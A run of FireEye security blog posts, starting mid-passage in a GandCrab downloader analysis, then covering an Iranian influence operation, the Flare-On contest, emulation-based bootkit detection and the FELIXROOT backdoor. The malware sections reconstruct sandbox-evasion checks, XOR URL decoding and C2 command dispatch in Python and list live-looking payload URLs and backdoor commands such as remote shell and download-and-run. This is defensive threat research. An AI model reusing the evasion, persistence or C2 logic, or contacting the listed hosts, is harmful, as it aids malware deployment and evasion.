349C9C8Bh | Sandboxiedcomlaunch.exe
5BA9B1FEh | procmon.exe
3CE2BEF3h | regmon.exe
3D46F02Bh | filemon.exe
77AE10F7h | wireshark.exe
0F344E95Dh | netmon.exe
278CDF58h | vmtoolsd.exe

Table 1: Blacklisted checksums

If any process checksums match, the malware goes into an infinite loop, effectively becoming benign from this point onward (Figure 15).


Figure 15: Blacklisted CRC32 check
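
The following minimal Python sketch reproduces the spirit of this blacklist check. Note that the exact CRC32 variant, seed, and string casing used by the sample are not documented here, so the use of zlib.crc32 and lowercased process names below is an assumption for illustration only.

import zlib

# Subset of the blacklisted checksums from Table 1 (illustrative; extend as needed).
BLACKLISTED_CRC32 = {
    0x99DD4432,   # vmwareuser.exe
    0x2D859DB4,   # vmwareservice.exe
    0x64340DCE,   # vboxservice.exe
    0x77AE10F7,   # wireshark.exe
    0x278CDF58,   # vmtoolsd.exe
}

def is_analysis_environment(process_names):
    """Return True if any running process name hashes to a blacklisted CRC32."""
    for name in process_names:
        checksum = zlib.crc32(name.lower().encode()) & 0xFFFFFFFF
        if checksum in BLACKLISTED_CRC32:
            return True
    return False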

If this check passes, a new thread is started in which the malware first acquires "SeShutdownPrivilege" and checks its own image path, OS version, and architecture (x86/x64). For OS version 6.3 (Windows 8.1/Windows Server 2012 R2), the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\ctfmon.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\ctfmon.exe" with a copy of itself
  • Check whether "ctfmon.exe" is already running. If not, add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In other OS versions, the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\rundll32.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\rundll32.exe" with a copy of itself
  • Add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In either case, if the malware fails to replace the system file, it copies itself to the locations listed in Table 2 and executes via ShellExecuteW.

Dump Path | Dump Name
%APPDATA%\Microsoft | {random alphabets}.exe
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup | {random alphabets}.pif

Table 2: Alternate dump paths

On execution, the malware checks whether it is running as ctfmon.exe/rundll32.exe or as one of the executables listed in Table 2. If this check passes, the downloader branch starts executing (Figure 16).


Figure 16: Downloader code execution after image path checks

A mutex named "Alphabeam ldr" is created to prevent multiple executions. Payload URL decoding then takes place: the encoded data is copied to a blob via mov operations (Figure 17).


Figure 17: Encoded URL being copied

A 32-byte multi-XOR key is set up with the algorithm shown in Figure 18.


Figure 18: XOR key generation

XOR Key (83439fb10d4f9e18ea7d1ebb4009bdf7)

{ 0x25, 0x24, 0x60, 0x67, 0x00, 0x20, 0x23, 0x65, 0x6c, 0x00, 0x2f, 0x2e, 0x6e, 0x69, 0x00, 0x2a, 0x35, 0x73, 0x76, 0x00, 0x31, 0x30, 0x74, 0x73, 0x00, 0x3c, 0x3f, 0x79, 0x78, 0x00, 0x3b, 0x3a }

Finally, the actual decoding is done using PXOR with XMM registers (Figure 19).


Figure 19: Payload URL XOR decoding
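
As a rough Python equivalent, the PXOR-based decoding amounts to a byte-wise XOR against the repeating 32-byte key shown above. The encoded blob itself is not reproduced in this post, so the encoded_url argument below is a placeholder.

# Key recovered from sample 83439fb10d4f9e18ea7d1ebb4009bdf7 (see above).
XOR_KEY = bytes([
    0x25, 0x24, 0x60, 0x67, 0x00, 0x20, 0x23, 0x65,
    0x6C, 0x00, 0x2F, 0x2E, 0x6E, 0x69, 0x00, 0x2A,
    0x35, 0x73, 0x76, 0x00, 0x31, 0x30, 0x74, 0x73,
    0x00, 0x3C, 0x3F, 0x79, 0x78, 0x00, 0x3B, 0x3A,
])

def decode_url(encoded_url: bytes) -> bytes:
    # PXOR processes 16 bytes per instruction; a byte-wise XOR with the
    # repeating 32-byte key produces the same result.
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(encoded_url))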

This leads the way for the downloader switch loop to execute (Figure 20).


Figure 20: Response/Download handler

Table 3 shows a breakdown of HTTP requests, their expected responses (where body = HTTP response body), and corresponding actions.

Request # | Request URL | (Expected Response) body+0x0 | body+0x4 | body+0x7 | Action
1 | hxxp://91[.]210.104.247/update.bin | 0x666555 | 0x0 | URL for request #2 | Download payload via request #2, verify MZ and PE header, execute via CreateProcessW
1 | hxxp://91[.]210.104.247/update.bin | 0x666555 | 0x1 | N/A | Supposed to execute the already downloaded payload via CreateProcess; however, the functionality has been short-circuited, so it does nothing and continues the loop after a sleep
1 | hxxp://91[.]210.104.247/update.bin | 0x666555 | 0x2 | URL for request #2 | Download payload via request #2, verify MZ and PE header, load it manually in the native process space using its PE loader module
1 | hxxp://91[.]210.104.247/update.bin | 0x666555 | 0x3 | N/A | Supposed to execute the already downloaded payload via its PE loader; however, the functionality has been short-circuited, so it does nothing and continues the loop after a sleep
1 | hxxp://91[.]210.104.247/update.bin | 0x666555 | 0x4 | URL for request #3 | Perform request #3
1 | hxxp://91[.]210.104.247/update.bin | N/A | N/A | N/A | Sleep for 10 minutes and continue from request #1
2 | From response #1 | PE payload | N/A | N/A | Execute via CreateProcessW or internal PE loader, depending on previous response
3 | From response #1 | N/A | N/A | N/A | No action taken; sleep for 10 minutes and start with request #1

Table 3: HTTP requests, responses, and actions
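
To make the dispatch in Table 3 concrete, here is a hedged Python sketch of the response handling. The 0x666555 magic value and the body offsets come from the table; the field widths, endianness, and the download() helper are assumptions for illustration.

import struct

MAGIC = 0x666555

def handle_response(body: bytes) -> str:
    # Malformed or unexpected body: sleep for 10 minutes and retry request #1.
    if len(body) < 8 or struct.unpack_from("<I", body, 0)[0] != MAGIC:
        return "sleep"
    command = body[4]
    if command in (0x0, 0x2):
        url = body[7:].split(b"\x00")[0].decode(errors="replace")
        payload = download(url)          # hypothetical helper performing request #2
        if payload[:2] == b"MZ":         # basic MZ check (full PE validation omitted)
            return "create_process" if command == 0x0 else "load_in_memory"
    elif command == 0x4:
        return "perform_request_3"
    # Commands 0x1 and 0x3 have been short-circuited in the sample.
    return "sleep"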

The request sequence leads to GandCrab ransomware being fetched and manually loaded into memory by the malware. Figure 21 and Figure 22 show sample request #1 and request #2 respectively, leading to the download and execution of GandCrab (8dbaf2fda5d19bab0d7c1866e0664035).


Figure 21: Request #1 fetching initial command sequence from payload URL


Figure 22: Request #2 downloads GandCrab ransomware that gets manually loaded into memory

Conclusion

In recent years, arrests and disruptions of underground operations have led to a heavy decline in exploit kit activity. Still, exploit kits pose a significant threat to users who are not running fully patched systems. Nowadays we see more exploit kit activity in the Asia Pacific region, where users tend to have more vulnerable software. Meanwhile, in North America, the focus tends to be on more straightforward social engineering campaigns.

FireEye Network Security detects all exploits, social engineering campaigns, malware, and command and control communication mentioned in this post. MVX technology used in multiple FireEye products detects the first stage and second stage malware described in this post.

Indicators of Compromise

Domain / IP / Address / Filename | MD5 Hash or Description
finalcountdown.gq, naosecgomosec.gq, ladcbteihg.gq, dontneedcoffee.gq | Exploit kit domains
78.46.142.44, 185.243.112.198 | Exploit kit IPs
47B5.tmp | 4072690b935cdbfd5c457f26f028a49c
hxxp://46.101.205.251/wt/ww.php | Redirect URL example used between malvertisement and exploit kit controlled domains
hxxp://107.170.215.53/workt/trkmix.php?device=desktop&country=AT&connection.type=BROADBAND&clickid=58736927880257537&countryname=Austria&browser=ie&browserversion=11&carrier=%3F&cost=0.0004922&isp=BAXALTA+INCORPORATED+ASN&os=windows&osversion=6.1&useragent=Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+Trident%2F7.0%3B+rv%3A11.0%29+like+Gecko&campaignid=1326906&language=de&zoneid=1628971 | Redirect URL example used between malvertisement and exploit kit controlled domains
91.210.104[.]247/update.bin | Second stage payload download URL
91.210.104[.]247/not_a_virus.dll | 8dbaf2fda5d19bab0d7c1866e0664035, second stage payload (GandCrab ransomware)

Acknowledgements

We would like to thank Hassan Faizan for his contributions to this blog post.

Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East

FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the U.S., U.K., Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). The activity we have uncovered is significant, and demonstrates that actors beyond Russia continue to engage in and experiment with online, social media-driven influence operations to shape political discourse.

What Is This Activity?

Figure 1 maps the registration and content promotion connections between the various inauthentic news sites and social media account clusters we have identified thus far. This activity dates back to at least 2017. At the time of publication of this blog post, we continue to investigate and identify additional social media accounts and websites linked to this activity. For example, we have identified multiple Arabic-language, Middle East-focused sites that appear to be part of this broader operation that we do not address here.


Figure 1: Connections among components of suspected Iranian influence operation

We use the term “inauthentic” to describe sites that are not transparent in their origins and affiliations, undertake concerted efforts to mask these origins, and often use false social media personas to promote their content. The content published on the various websites consists of a mix of both original content and news articles appropriated, and sometimes altered, from other sources.

Who Is Conducting this Activity and Why?

Based on an investigation by FireEye Intelligence’s Information Operations analysis team, we assess with moderate confidence that this activity originates from Iranian actors. This assessment is based on a combination of indicators, including site registration data and the linking of social media accounts to Iranian phone numbers, as well as the promotion of content consistent with Iranian political interests. For example:

  • Registrant emails for the sites ‘Liberty Front Press’ and ‘Instituto Manquehue’ are associated with advertisements for website designers in Tehran and with the Iran-based site gahvare[.]com, respectively.
  • We have identified multiple Twitter accounts directly affiliated with the sites, as well as other associated Twitter accounts, that are linked to phone numbers with the +98 Iranian country code.
  • We have observed inauthentic social media personas, masquerading as American liberals supportive of U.S. Senator Bernie Sanders, heavily promoting Quds Day, a holiday established by Iran in 1979 to express support for Palestinians and opposition to Israel.

We limit our assessment regarding Iranian origins to moderate confidence because influence operations, by their very nature, are intended to deceive by mimicking legitimate online activity as closely as possible. While highly unlikely given the evidence we have identified, some possibility nonetheless remains that the activity could originate from elsewhere, was designed for alternative purposes, or includes some small percentage of authentic online behavior. We do not currently possess additional visibility into the specific actors, organizations, or entities behind this activity. Although the Iran-linked APT35 (Newscaster) has previously used inauthentic news sites and social media accounts to facilitate espionage, we have not observed any links to APT35.

Broadly speaking, the intent behind this activity appears to be to promote Iranian political interests, including anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as to promote support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). In the context of the U.S.-focused activity, this also includes significant anti-Trump messaging and the alignment of social media personas with an American liberal identity. However, it is important to note that the activity does not appear to have been specifically designed to influence the 2018 U.S. midterm elections, as it extends well beyond U.S. audiences and U.S. politics.

Conclusion

The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media-driven influence operations as a means of shaping political discourse. These operations extend well beyond those conducted by Russia, which has often been the focus of research into information operations over recent years. Our investigation also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.

Additional Details

The full report is available for download via the link at the top right of the page.

Announcing the Fifth Annual Flare-On Challenge

The FireEye Labs Advanced Reverse Engineering (FLARE) team’s annual reverse engineering challenge will start at 8:00 p.m. ET on Aug. 24, 2018. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. So dust off your disassembler, put a new coat of oil on your old debugger, and get your favorite chat client ready to futilely beg your friends for help. Once again, this contest is designed for individuals, not teams, and it is a single track of challenges. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 5, 2018.

This year’s contest will once again host a total of 12 challenges covering x86 and x64 on Windows, Java, .NET, WebAssembly, and Linux, with special appearances of bootloaders and bootkits. This is one of the only Windows-centric CTF challenges out there, and we have crafted it to represent the skills and challenges of our workload on the FLARE team.

If you complete the Flare-On Challenge you will receive a prize and permanent recognition on the flare-on.com website for your accomplishment. Prize details will be revealed when the contest ends, but as always, it will be something that will be coveted and envied by your peers. In prior years we’ve had rodeo belt buckles, replica police badges, challenge coins, and a huge pin.

Check out the Flare-On website for a live countdown timer and to see the previous year’s winners. For official news and support we will be using the Twitter hashtag: #flareon5.

BIOS Boots What? Finding Evil in Boot Code at Scale!

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is at least 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts) | Avg # Unique Boot Records (MD5)
100-1000 | 428
1000-10000 | 4,738
10000+ | 8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.
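
A minimal Python sketch of that custom hashing approach, assuming a raw 512-byte MBR as input (the offsets are the ones given above; everything else is illustrative):

import hashlib

def partial_mbr_hash(mbr: bytes) -> str:
    # Hash only the code regions, skipping the dynamic bytes (disk signature
    # and partition table data) that fall outside these two ranges.
    assert len(mbr) >= 440, "expected at least the first 440 bytes of the MBR"
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()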

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed for follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing each assembly instruction as it executes to ultimately arrive at the “execution hash”.


Figure 2: Execution hash
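
The idea translates naturally to the Unicorn and Capstone Python bindings. The sketch below is a simplified approximation, assuming the record is loaded at 0000:7C00h and capping emulation at an arbitrary instruction count; the production pipeline's setup and error handling are more involved.

import hashlib
from capstone import Cs, CS_ARCH_X86, CS_MODE_16
from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_16, UC_HOOK_CODE

def execution_hash(boot_record: bytes) -> str:
    md = Cs(CS_ARCH_X86, CS_MODE_16)
    digest = hashlib.md5()

    def hook_code(uc, address, size, user_data):
        # Disassemble the instruction about to execute and hash only its mnemonic.
        for insn in md.disasm(bytes(uc.mem_read(address, size)), address):
            digest.update(insn.mnemonic.encode())

    emu = Uc(UC_ARCH_X86, UC_MODE_16)
    emu.mem_map(0x0, 0x100000)                 # 1 MB of real-mode address space
    emu.mem_write(0x7C00, boot_record)         # BIOS loads the boot sector at 0000:7C00h
    emu.hook_add(UC_HOOK_CODE, hook_code)
    try:
        emu.emu_start(0x7C00, 0x7C00 + len(boot_record), count=100000)
    except UcError:
        pass                                   # unhandled interrupts etc. end emulation early
    return digest.hexdigest()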

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.
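
Within the same emulation framework, this class of behavior can be flagged with a memory-write hook. The sketch below, using the Unicorn Python bindings, assumes it is attached to an emulator set up like the execution-hash example; the exact ranges monitored and the reporting format are illustrative.

from unicorn import UC_HOOK_MEM_WRITE

IVT_START, IVT_END = 0x0000, 0x03FC      # interrupt vector table (0000:0000h to 0000:03FCh)
BDA_START, BDA_END = 0x0400, 0x04FF      # BIOS Data Area (starts at 0040:0000h)

def hook_mem_write(uc, access, address, size, value, findings):
    if IVT_START <= address <= IVT_END:
        findings.append(("IVT write (possible interrupt hook)", hex(address)))
    elif BDA_START <= address <= BDA_END:
        findings.append(("BDA write (possible memory-size tampering)", hex(address)))

# Attach to an existing Unicorn instance, for example:
# findings = []
# emu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write, user_data=findings)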

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.
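
As a hypothetical sketch of that submission step (bucket and function names are placeholders, not FireEye's actual resources, and the validation shown is deliberately simplistic):

import base64
import json
import uuid

import boto3

s3 = boto3.client("s3")
lambda_client = boto3.client("lambda")

def handler(event, context):
    record = base64.b64decode(event["boot_record_b64"])
    # Simplistic sanity check: a first-sector boot signature of 0x55AA.
    if len(record) < 512 or record[510:512] != b"\x55\xaa":
        return {"statusCode": 400, "body": "not a valid boot record"}

    record_id = str(uuid.uuid4())
    s3.put_object(Bucket="boot-records", Key=record_id, Body=record)

    # InvocationType="Event" makes the call asynchronous, allowing many
    # analysis Lambdas to run in parallel.
    lambda_client.invoke(
        FunctionName="boot-record-analysis",
        InvocationType="Event",
        Payload=json.dumps({"record_id": record_id}).encode(),
    )
    return {"statusCode": 202, "body": json.dumps({"record_id": record_id})}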

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the X15 engine, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.


Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). The downloaded file is weaponized with CVE-2017-11882.


Figure 2: Lure documents


Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.


Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via the Equation Editor executable. The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) is then used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.


Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.


Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.


Figure 7: Unicode decryption routine

Upon execution, a new thread is created in which the backdoor sleeps for 10 minutes. It then checks whether it was launched by RUNDLL32.exe with parameter #1; if so, it proceeds with initial system triage before beginning command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.


Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referred from the “ROOT\CIMV2” and “Root\SecurityCenter2” namespace.

WMI Classes
Win32_OperatingSystem
Win32_ComputerSystem
AntiSpywareProduct
AntiVirusProduct
FirewallProduct
Win32_UserAccount
Win32_NetworkAdapter
Win32_Process

Table 1: Referred classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem
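
For analysts who want to see what these queries return on a clean host, an equivalent using the third-party wmi Python package is shown below. This is purely an illustration of the listed queries, not the backdoor's own code.

import wmi

c = wmi.WMI(namespace="root\\CIMV2")
timezone = c.query("SELECT Caption FROM Win32_TimeZone")
os_info = c.query(
    "SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser "
    "FROM Win32_OperatingSystem"
)
system = c.query(
    "SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName "
    "FROM Win32_ComputerSystem"
)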

Registry entries are read for potential privilege escalation and proxy information.

  1. Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. Registry key “Software\Microsoft\Windows\CurrentVersion\Internet Settings\” is queried to gather proxy information with the values ProxyEnable, Proxy: (NO), Proxy, and ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.

Command | Description
0x31 | Fingerprint System via WMI and Registry
0x32 | Drop File and execute
0x33 | Remote Shell
0x34 | Terminate connection with C2
0x35 | Download and run batch script
0x36 | Download file on machine
0x37 | Upload File

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.


Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).


Figure 10: POST request to C2 server

All other fields that are part of the request/response headers, such as User-Agent, Content-Type, and Accept-Encoding, are XOR encrypted and stored in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, and processor architecture, plus two additional values: “1.3” and “KdfrJKN”. The value “KdfrJKN” may be used as identification for the campaign and is found in the JSON object in the file (Figure 11).


Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).

Parameter | Description
‘u=’ | Contains target machine information in the following format: <Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, <KdfrJKN>, <Volume Serial Number>
‘&h=’ | Includes the information about the command executed and its results.
‘&p=’ | Contains the information about data associated with the C2 server.

Table 3: FELIXROOT backdoor parameters

Cryptography

All data is transferred to the C2 servers using AES encryption and the IBindCtx COM interface over HTTP or HTTPS. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.


Figure 12: RSA public key 1


Figure 13: RSA public key 2


Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.


Figure 15: Structure used to send data to server


Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.
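
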